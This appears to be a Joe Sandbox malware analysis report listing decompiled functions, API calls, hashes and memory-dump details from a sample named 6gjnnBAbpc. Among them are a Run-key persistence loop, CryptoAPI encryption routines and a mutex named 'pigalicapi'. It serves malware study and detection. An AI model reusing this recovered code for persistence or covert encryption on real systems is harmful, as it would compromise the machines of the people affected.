								E04007B70(_v44, _v12, _v20);
								 *_a16 = _v44;
							}
						}
					}
				}
				return _v8;
			}

0x04005b56
0x04005b61
0x04005b85
0x04005b92
0x04005b95
0x04005b9c
0x04005ba3
0x04005bbc
0x04005bc3
0x04005bcb
0x04005bd7
0x00000000
0x04005bde
0x00000000
0x04005bc3
0x04005be6
0x04005bf6
0x04005bfc
0x04005c03
0x04005c09
0x04005c10
0x04005c17
0x04005c30
0x04005c37
0x04005c59
0x04005c68
0x04005c71
0x04005c7a
0x04005c87
0x00000000
0x04005c87
0x00000000
0x04005c37
0x04005c8f
0x04005ca4
0x04005cab
0x04005cb9
0x04005cc7
0x04005cc7
0x04005cab
0x04005c8f
0x04005c03
0x04005ccf

APIs

lstrlenA.KERNEL32(00000000), ref: 04005B7F
lstrlenA.KERNEL32(00000000), ref: 04005B8C
StrStrIA.SHLWAPI(00000000,00000000), ref: 04005BB6
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005BF6
StrStrIA.SHLWAPI(00000000,00000000), ref: 04005C2A
lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 04005C59
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005C9E

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: AllocVirtuallstrlen$lstrcpyn
String ID:
API String ID: 808621155-0
Opcode ID: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
Instruction ID: 5a59fe48962482dc997a37d5c0ed7d0013e253906576cb4b19edba68c8a08fb2
Opcode Fuzzy Hash: 87716a91232c7d4b55081c1f55d7f64912373dfad697bd4087df7a6950954879
Instruction Fuzzy Hash: D451C774904209EFEB04CF94C998BEEBBB5EF48305F148559E505B7284D379AA80CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04006CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04006CF0() {
				char _v5;
				void* _v12;
				void* _v16;
				int _v20;
				int _v24;
				long _v28;
				char _v60;
				long _t21;
				long _t24;
				char* _t26;
				char* _t30;
				char* _t32;

				_v5 = 0;
				_v12 = 0x80000001;
				if(( *0x401435a & 0x000000ff) != 0) {
					_v12 = 0x80000002;
				}
				_v16 = 0;
				_t32 =  *0x40118a0; // 0x4013b88
				_t21 = RegOpenKeyExA(_v12, _t32, 0, 0xf003f,  &_v16); // executed
				if(_t21 == 0) {
					_v24 = 0x20;
					_v20 = 3;
					_t30 =  *0x4011890; // 0x4013fa6
					_t24 = RegQueryValueExA(_v16, _t30, 0,  &_v20,  &_v60,  &_v24); // executed
					_v28 = _t24;
					if(_v28 == 0) {
						_v5 = 1;
						_t26 =  *0x4011890; // 0x4013fa6
						RegDeleteValueA(_v16, _t26);
					}
					RegCloseKey(_v16);
				}
				return _v5;
			}

0x04006cf6
0x04006cfa
0x04006d0a
0x04006d0c
0x04006d0c
0x04006d13
0x04006d25
0x04006d30
0x04006d38
0x04006d3a
0x04006d41
0x04006d56
0x04006d61
0x04006d67
0x04006d6e
0x04006d70
0x04006d74
0x04006d7e
0x04006d7e
0x04006d88
0x04006d88
0x04006d94

APIs

RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
RegCloseKey.ADVAPI32(00000000), ref: 04006D88

Strings

, xrefs: 04006D3A

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Value$CloseDeleteOpenQuery
String ID:
API String ID: 647993726-3916222277
Opcode ID: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
Instruction ID: 88112219bc8656018e8fd12fe99521312711d887651bf4d09d45951e100356d5
Opcode Fuzzy Hash: 7e3867fdce199c8a5bb6ff6aa161a31bc633291f878d7ee7a05f6acc28b5ac08
Instruction Fuzzy Hash: DE114275D04208AFEB04DFE0D848BBEBBB8FB48304F148158EA00BB280D77D5A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04008370 Relevance: 7.7, APIs: 6, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04008370(intOrPtr _a4, long _a8, char _a12, intOrPtr _a16) {
				long _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr* _v56;
				long _v60;
				void* _t79;
				void* _t80;
				void* _t85;
				void* _t90;
				void* _t94;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a16 < _a8) {
					L17:
					return _v8;
				} else {
					_t79 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
					_v16 = _t79;
					_t80 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
					_v12 = _t80;
					if(_v16 != 0 && _v12 != 0) {
						_v24 = 0x1000;
						_v20 = 0x1000;
						_t85 = E04008800(_v16,  &_v24, _v12,  &_v20, 0x4013378, 0x94); // executed
						if(_t85 != 0) {
							_t21 = _a8 + 0x10; // 0x1010
							_v28 = _v20 + _t21;
							_t170 = _a16 - _v28;
							if(_a16 >= _v28) {
								_v40 = E04008770(_t170, 0xa);
								_v36 = E040087D0(0xffffffff);
								_t90 = VirtualAlloc(0, _a8, 0x3000, 4); // executed
								_v32 = _t90;
								if(_v32 != 0) {
									_v44 = _a8;
									E04007B70(_v32, _a4, _a8);
									_t94 = E04008970(_v32,  &_v44, _v16, _v24); // executed
									if(_t94 != 0) {
										_v48 = _a12;
										E040085D0( &_v48,  &_v40, 4);
										E040085D0( &_v48,  &_v36, 4);
										_v60 = 0;
										_v56 = _v48;
										E040085D0( &_v48,  &_v60, 4);
										_v52 = _v48;
										E040085D0( &_v48,  &_v20, 4);
										E040085D0( &_v48, _v12, _v20);
										E04008650(_v36, _v52, _v48 - _v52, _v36);
										E040085D0( &_v48, _v32, _v44);
										 *_v56 = E040016F0(_a12 + 0xc, _v48 - _a12 + 0xc);
										_v8 = _v48 - _a12;
									}
									VirtualFree(_v32, 0, 0x8000); // executed
								}
							}
						}
					}
					if(_v16 != 0) {
						VirtualFree(_v16, 0, 0x8000); // executed
					}
					if(_v12 != 0) {
						VirtualFree(_v12, 0, 0x8000); // executed
					}
					goto L17;
				}
			}

0x04008376
0x04008381
0x040085c0
0x040085c6
0x040083b1
0x040083bf
0x040083c5
0x040083d6
0x040083dc
0x040083e3
0x040083f3
0x040083fa
0x0400841b
0x04008425
0x04008431
0x04008435
0x0400843b
0x0400843e
0x0400844e
0x0400845b
0x0400846b
0x04008471
0x04008478
0x04008481
0x04008490
0x040084a8
0x040084b2
0x040084bb
0x040084c8
0x040084da
0x040084e2
0x040084ec
0x040084f9
0x04008504
0x04008511
0x04008525
0x0400853c
0x04008550
0x04008576
0x0400857e
0x0400857e
0x0400858c
0x0400858c
0x04008478
0x0400843e
0x04008425
0x04008596
0x040085a3
0x040085a3
0x040085ad
0x040085ba
0x040085ba
0x00000000
0x040085ad

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083BF
VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 040083D6
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0400846B

Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
Part of subcall function 04008970: GetLastError.KERNEL32 ref: 040089C9
Part of subcall function 04008970: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
Part of subcall function 04008970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
Part of subcall function 04008970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
Part of subcall function 04008970: CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
Part of subcall function 04008970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400858C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085A3
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 040085BA

Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
Part of subcall function 04008800: GetLastError.KERNEL32 ref: 04008845
Part of subcall function 04008800: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
Part of subcall function 04008800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
Part of subcall function 04008800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
Part of subcall function 04008800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
Part of subcall function 04008800: CryptDestroyKey.ADVAPI32(?), ref: 04008937

Part of subcall function 040087D0: QueryPerformanceCounter.KERNEL32(?), ref: 040087E7

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
String ID:
API String ID: 487564122-0
Opcode ID: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
Instruction ID: 75e4ec9ffd75ad85335d37f2dbfda6536f989acb89096578b4a6032df118288e
Opcode Fuzzy Hash: cd64014fca8a1fd3dedaf543264f396e97ee9f29ef2d2d9375146d60c3b71fee
Instruction Fuzzy Hash: A0711CB6D00208ABEB14EFA4D845FEEB7B4BB48305F14C519EA15B72C0E774EA44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 040012D0 Relevance: 7.6, APIs: 5, Instructions: 57
registrysleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E040012D0(CHAR* _a4) {
				CHAR* _v8;
				char* _v12;
				CHAR* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				long _t26;

				_v8 = _a4;
				if(_v8 != 0) {
					_v16 = _v8;
					_v12 = "software\\microsoft\\windows\\currentversion\\run";
					while( *0x4014370 == 0) {
						_v20 = 0x80000001;
						if(( *(_v8 + 0x30c) & 0x000000ff) != 0) {
							_v20 = 0x80000002;
						}
						_v24 = 0;
						_t26 = RegOpenKeyExA(_v20, _v12, 0, 0xf003f,  &_v24); // executed
						if(_t26 == 0) {
							_v28 = lstrlenA(_v16);
							RegSetValueExA(_v24, _v8 + 0x208, 0, 1, _v16, _v28); // executed
							RegCloseKey(_v24);
						}
						Sleep(0x1388); // executed
					}
				}
				return 0;
			}

0x040012d9
0x040012e0
0x040012e9
0x040012ec
0x040012f3
0x04001301
0x04001314
0x04001316
0x04001316
0x0400131d
0x04001337
0x0400133f
0x0400134b
0x04001368
0x04001372
0x04001372
0x0400137d
0x0400137d
0x040012fc
0x0400138d

APIs

RegOpenKeyExA.KERNEL32(80000001,0400C248,00000000,000F003F,00000000), ref: 04001337
lstrlenA.KERNEL32(?), ref: 04001345
RegSetValueExA.KERNEL32(00000000,-00000208,00000000,00000001,?,?), ref: 04001368
RegCloseKey.ADVAPI32(00000000), ref: 04001372
Sleep.KERNEL32(00001388), ref: 0400137D

Memory Dump Source

Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true

Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd

Similarity

API ID: CloseOpenSleepValuelstrlen
String ID:
API String ID: 3411147897-0
Opcode ID: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
Instruction ID: 889d750eda8961b126f00a9021e235014b30ece64fb5bfebafecfaf2f158f27d
Opcode Fuzzy Hash: 938b7cb6186ad2cb83b89a2b0749dbfdb9b9446470f7ced15d3d2a40044d04a4
Instruction Fuzzy Hash: 12210070A04309EBEB04CFE4C949BAEB7B4FB44301F108258E641BB280D779AE40DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF9C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

memcpy.NTDLL ref: 0040CF7F
VirtualProtect.KERNEL32 ref: 0040CFC7
memcpy.NTDLL ref: 0040CFDD
VirtualProtect.KERNEL32 ref: 0040D007

Strings

@, xrefs: 0040CFB5

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: ProtectVirtualmemcpy
String ID: @
API String ID: 4237922067-2766056989
Opcode ID: 8db564d9ec81a64df9146292d569b296ad7d3bff1fbc65882943e8c813c52fae
Instruction ID: 6571a1a19d4867cb41af07d93aa71d0a9a5c92769b2966b0a7b26dbabfc254cc
Opcode Fuzzy Hash: 8db564d9ec81a64df9146292d569b296ad7d3bff1fbc65882943e8c813c52fae
Instruction Fuzzy Hash: 7A015EB5A05205AFDB10EFA9D58459EFBF1EF88354F50882AF998E7350D334A8448B46

Uniqueness

Uniqueness Score: -1.00%

Function 100021A0 Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
SetLastError.KERNEL32(0000007E), ref: 1000223B

Memory Dump Source

Source File: 00000000.00000002.670998844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10001000_6gjnnBAbpc.jbxd

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
Instruction ID: c08fe1bd30c15a7bb6e8476d185febfb1ca0f6f7539b963f039c2b10503cc3e6
Opcode Fuzzy Hash: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
Instruction Fuzzy Hash: CB818574A00209EFDB04CF94C890B9EBBB5FF88354F248198E959AB355D774EE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00412210 Relevance: 6.1, APIs: 4, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00412210() {
				void* _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v52;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t24;
				intOrPtr _t25;
				signed int _t27;
				char* _t31;
				signed int _t33;
				signed int _t38;
				void* _t39;
				void* _t44;
				void* _t46;
				intOrPtr* _t47;
				signed int _t48;
				void* _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				void* _t54;
				void* _t55;
				char* _t57;
				void* _t58;
				void* _t61;
				char** _t62;
				signed int* _t65;

				_t62 = _t61 - 0x10;
				_t24 = E004102F0(_t46, _t49, _t50, _t54, _t55);
				_t47 = _t24;
				if(_t24 == 0 || ( *(_t24 + 0x20) & 0x0000000c) != 0) {
					L4:
					return _t24;
				} else {
					_t25 =  *0x422438; // 0xe727a0
					if(_t25 == 0) {
						_v20 = 0;
						_v24 = 4;
						 *_t62 = "_pthread_cancelling_shmem"; // executed
						_t24 = E00414330(__eflags); // executed
						 *0x422438 = _t24;
					}
					if( *_t24 != 0) {
						_t5 = _t47 + 0x1c; // 0x1c
						_t57 = _t5;
						 *_t62 = _t57;
						E00413FD0();
						_t27 =  *(_t47 + 0x20) & 0x000000ff;
						__eflags = _t27 & 0x00000003;
						if((_t27 & 0x00000003) == 0) {
							L8:
							 *_t62 = _t57;
							return E00413A00(_t49);
						} else {
							_t51 =  *(_t47 + 0x24);
							__eflags = _t51 & 0x00000001;
							if((_t51 & 0x00000001) == 0) {
								goto L8;
							} else {
								_t49 =  *(_t47 + 0x10);
								__eflags =  *(_t47 + 0x10);
								if( *(_t47 + 0x10) <= 0) {
									_t52 = _t51 & 0xfffffffe;
									 *(_t47 + 0x20) = _t27 & 0xfffffff3 | 0x00000004;
									_t31 =  *(_t47 + 0x18);
									 *(_t47 + 0x24) = _t52;
									__eflags = _t31;
									if(_t31 != 0) {
										 *_t62 = _t31;
										ResetEvent(??);
										_push(_t47);
									}
									 *_t62 = _t57;
									E00413A00(_t49);
									E00412120();
									_push(_t57);
									_push(_t47);
									_t65 = _t62 - 0x10;
									_t33 = _v24;
									__eflags = _t33;
									if(_t33 == 0) {
										E004102F0(_t47, _t49, _t52, _t54, _t57);
										goto L21;
									} else {
										 *_t65 = _t33;
										_t38 = E00415BD0();
										__eflags = _t52;
										if(_t52 <= 0) {
											__eflags = _t38 - 0xfffffffe;
											if(_t38 > 0xfffffffe) {
												goto L15;
											} else {
												_t48 = _t38;
												_t44 = E004102F0(_t48, _t49, _t52, _t54, _t57);
												__eflags = _t48;
												_t58 = _t44;
												if(_t48 != 0) {
													goto L16;
												} else {
													L21:
													E00412210();
													 *_t65 = 0;
													Sleep(??);
													E00412210();
													__eflags = 0;
													return 0;
												}
											}
										} else {
											L15:
											_t39 = E004102F0(_t47, _t49, _t52, _t54, _t57);
											_t48 = 0xffffffff;
											_t58 = _t39;
											L16:
											E00412210();
											_t53 =  *(_t58 + 0x18);
											__eflags = _t53;
											if(_t53 == 0) {
												 *_t65 = _t48;
												Sleep(??);
											} else {
												_v52 = _t48;
												 *_t65 = _t53;
												WaitForSingleObject(??, ??);
											}
											E00412210();
											__eflags = 0;
											return 0;
										}
									}
								} else {
									goto L8;
								}
							}
						}
					} else {
						goto L4;
					}
				}
			}

0x00412215
0x00412218
0x0041221f
0x00412221
0x00412238
0x0041223e
0x00412229
0x00412229
0x00412230
0x00412271
0x00412279
0x00412281
0x00412288
0x0041228d
0x0041228d
0x00412236
0x00412240
0x00412240
0x00412243
0x00412246
0x0041224b
0x0041224f
0x00412251
0x00412262
0x00412262
0x00412270
0x00412253
0x00412253
0x00412256
0x00412259
0x00000000
0x0041225b
0x0041225b
0x0041225e
0x00412260
0x00412297
0x0041229d
0x004122a0
0x004122a3
0x004122a6
0x004122a8
0x004122aa
0x004122ad
0x004122b3
0x004122b3
0x004122b4
0x004122b7
0x004122bc
0x004122d3
0x004122d4
0x004122d5
0x004122d8
0x004122db
0x004122dd
0x00412357
0x00000000
0x004122df
0x004122df
0x004122e2
0x004122e7
0x004122ea
0x00412322
0x00412325
0x00000000
0x00412327
0x00412327
0x00412329
0x0041232e
0x00412330
0x00412332
0x00000000
0x00412334
0x00412334
0x00412334
0x00412339
0x00412340
0x00412349
0x00412351
0x00412356
0x00412356
0x00412332
0x004122ec
0x004122ec
0x004122ec
0x004122f1
0x004122f6
0x004122f8
0x004122f8
0x004122fd
0x00412300
0x00412302
0x00412360
0x00412363
0x00412304
0x00412304
0x00412308
0x0041230b
0x00412311
0x00412314
0x0041231c
0x00412321
0x00412321
0x004122ea
0x00000000
0x00000000
0x00000000
0x00412260
0x00412259
0x00000000
0x00000000
0x00000000
0x00412236

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5639b4af11f651155d8ad3dbe47d35675580404db8ee259bd86cb2999d768e2e
Instruction ID: 03044a26b96f7e7b193780177aff1d621ad6876101750b721eb7a4098160cad1
Opcode Fuzzy Hash: 5639b4af11f651155d8ad3dbe47d35675580404db8ee259bd86cb2999d768e2e
Instruction Fuzzy Hash: C931E7716042048BDB10BFB996852DFBBA4EF04364F5406AEEC94C7241D7BCD9E0879B

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB00 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 86COMMON

Download Yara Rule

Strings

h%, xrefs: 0040FB04, 0040FB64, 0040FBDC, 0040FBFF
%, xrefs: 0040FB19, 0040FB3D, 0040FC2C, 0040FC6C

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID:
String ID: h%$%
API String ID: 0-3251446214
Opcode ID: f19e27de350e72c2be21b91eb14c2c843b9591aa7770d22e79dbda54baac12c1
Instruction ID: b4ea5088bbc2e04cae5ca264721ad58746302421d82bc6471c19b5581d7aa8aa
Opcode Fuzzy Hash: f19e27de350e72c2be21b91eb14c2c843b9591aa7770d22e79dbda54baac12c1
Instruction Fuzzy Hash: 10311EB0608301DEE720EF61D59031ABAF4AB40344F44C83E9985AB695D7BC944ADF6A

Uniqueness

Uniqueness Score: -1.00%

Function 004112B0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00411418
memset.NTDLL ref: 00411450

Strings

HY, xrefs: 00411304, 0041135C, 004113FB, 00411455, 0041148F, 004114B2, 00411503, 0041152C, 00411600, 004116B0, 00411724, 0041174A, 004117F4, 00411840

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: memsetrealloc
String ID: HY
API String ID: 3488966140-1821855334
Opcode ID: 73e63d71c0d50dbc6898d8e05f666f7501ca3559874ea9105649bcf31ce7fe83
Instruction ID: dad7b14d47605fe78516e20dfcd52e82a159e52376bfce22ed144a28b74165c8
Opcode Fuzzy Hash: 73e63d71c0d50dbc6898d8e05f666f7501ca3559874ea9105649bcf31ce7fe83
Instruction Fuzzy Hash: 68D15CB0704305EFD720EF15E68079ABBF0AB84344F90882EE6858B361D7B99485CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 004112F9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00411418
memset.NTDLL ref: 00411450

Strings

HY, xrefs: 00411304, 004113FB, 00411455, 0041148F

Memory Dump Source

Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd

Similarity

API ID: memsetrealloc
String ID: HY
API String ID: 3488966140-1821855334
Opcode ID: 97bb11881bd2020a3b0d54998a8ba70a51bdb0b6a11ad9c7bf1f36cbdd451e12
Instruction ID: 1e92ba9ca6738bd07df40508bbb0f1f8677d13f166ee6327e985d8f32876cbf7
Opcode Fuzzy Hash: 97bb11881bd2020a3b0d54998a8ba70a51bdb0b6a11ad9c7bf1f36cbdd451e12
Instruction Fuzzy Hash: 5E411C703003059FD720DF2ADA80B9A77E4EB45744F84452AEA59CB375E779E881CB58

Uniqueness

Uniqueness Score: -1.00%

Function 04005E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04005E00() {

				CreateMutexA(0, 0, "pigalicapi"); // executed
				return 0 | GetLastError() == 0x000000b7;
			}

0x04005e0c
0x04005e25

APIs

CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
